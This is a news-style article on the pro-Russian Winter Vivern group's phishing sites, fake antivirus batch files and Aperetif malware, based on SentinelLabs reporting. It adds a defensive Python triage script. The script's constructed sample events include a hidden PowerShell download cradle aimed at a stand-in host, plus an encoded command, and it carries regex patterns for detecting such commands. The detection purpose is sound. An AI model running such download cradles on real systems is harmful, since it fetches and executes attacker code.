Winter Vivern, an advanced hacking group believed to be pro-Russian, is targeting European government organizations and telecommunication service providers for espionage.
The group is said to function on limited resources, but their creativity compensates for these limitations, as per SentinelLabs. The hackers have targeted government organizations in Lithuania, Slovakia, the Vatican, and India, and more recently individuals working in the governments of Poland, Italy, Ukraine, and India.
The hackers have also targeted telecommunication companies, especially those supporting Ukraine since the Russian invasion. Recently, Winter Vivern created webpages mimicking those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine to distribute malicious files to visitors who end up there by clicking on links in malicious emails. Winter Vivern has previously used such cloned sites to drop spreadsheet files with malicious macros that launch PowerShell.
SentinelLabs reports Winter Vivern’s resourcefulness in using Windows batch files to impersonate antivirus scanners while downloading malicious payloads.
The malware delivered through this process is named “Aperetif,” capable of automatic file scanning and exfiltration, taking screenshots, and sending all data in base64-encoded form to a hardcoded command-and-control (C2) server URL. Winter Vivern has recently used a new payload similar in functionality to Aperetif, indicating that the tooling is still a work in progress.
In both cases, the malware beacons to the C2 server via PowerShell and waits for instructions or additional payloads.
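As an added detection example (not code from the SentinelLabs report or from this article), the following Python triages constructed Sysmon-style process-creation records for the behaviours described above: an Office application or a batch file spawning PowerShell, PowerShell download cradles, and encoded PowerShell commands. The event layout, field names, URL and base64 fragment are all constructed for illustration.

```python
import re

# Constructed Sysmon-style process-creation records; none of this is real telemetry.
SAMPLE_EVENTS = [
    {   # macro-laced spreadsheet launching PowerShell to fetch a second stage
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
                        ".DownloadFile('http://payload.example.invalid/u.ps1','u.ps1')\"",
    },
    {   # batch file posing as an antivirus scan, handing off to encoded PowerShell
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "parent_command_line": r'cmd.exe /c "C:\Users\u\Downloads\AV_Scan.bat"',
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -EncodedCommand ZQBjAGgAbwAgAGgAaQA=",  # 'echo hi'
    },
    {   # benign: an admin script started from the desktop
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient", re.I)
ENCODED_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)

def basename(path):
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the report's behaviours that this one event matches."""
    hits = []
    if basename(event["image"]) != "powershell.exe":
        return hits
    cmd = event.get("command_line", "")
    parent = basename(event.get("parent_image", ""))
    if parent in OFFICE_APPS:                      # macro-laced document -> PowerShell
        hits.append("office_spawns_powershell")
    if parent == "cmd.exe" and ".bat" in event.get("parent_command_line", "").lower():
        hits.append("batch_spawns_powershell")     # fake-scanner batch file -> PowerShell
    if DOWNLOAD_RE.search(cmd):                    # payload retrieval from a remote URL
        hits.append("powershell_downloader")
    if ENCODED_RE.search(cmd):                     # obfuscated/encoded command line
        hits.append("powershell_encoded_command")
    return hits

def triage(events):
    """Map each event index to its matched behaviours, dropping events with none."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Parent-child pairing is the strongest signal here; the download and encoding checks on their own also fire on legitimate administration, so weight them as context rather than as alerts.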
In conclusion, Winter Vivern uses a relatively simplistic yet effective approach to lure its targets into downloading malicious files, and their low profile has helped them stay under-reported.
The hackers’ activities align with the interests of the Russian and Belarusian governments, indicating that Winter Vivern is a pro-Russian APT group.
Winter Vivern’s use of creative tactics to compensate for their limited resources and their low-profile approach make them a significant threat to government organizations and telecommunication service providers.